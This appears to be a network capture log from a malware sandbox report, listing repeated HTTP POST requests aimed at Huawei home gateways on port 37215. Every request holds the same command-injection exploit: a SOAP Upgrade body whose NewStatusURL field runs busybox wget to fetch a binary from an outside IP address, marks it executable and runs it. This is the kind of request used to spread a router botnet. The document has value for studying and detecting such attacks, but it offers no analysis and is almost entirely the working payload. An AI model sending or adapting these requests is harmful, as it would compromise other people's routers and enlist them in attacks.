                                                                      Aug 2, 2024 13:17:06.090281010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.841995001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.961710930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      17192.168.2.1443992102.63.118.17237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.634699106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.202140093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.874144077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.186059952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.841943026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.217693090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:24.713428020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:46.472492933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
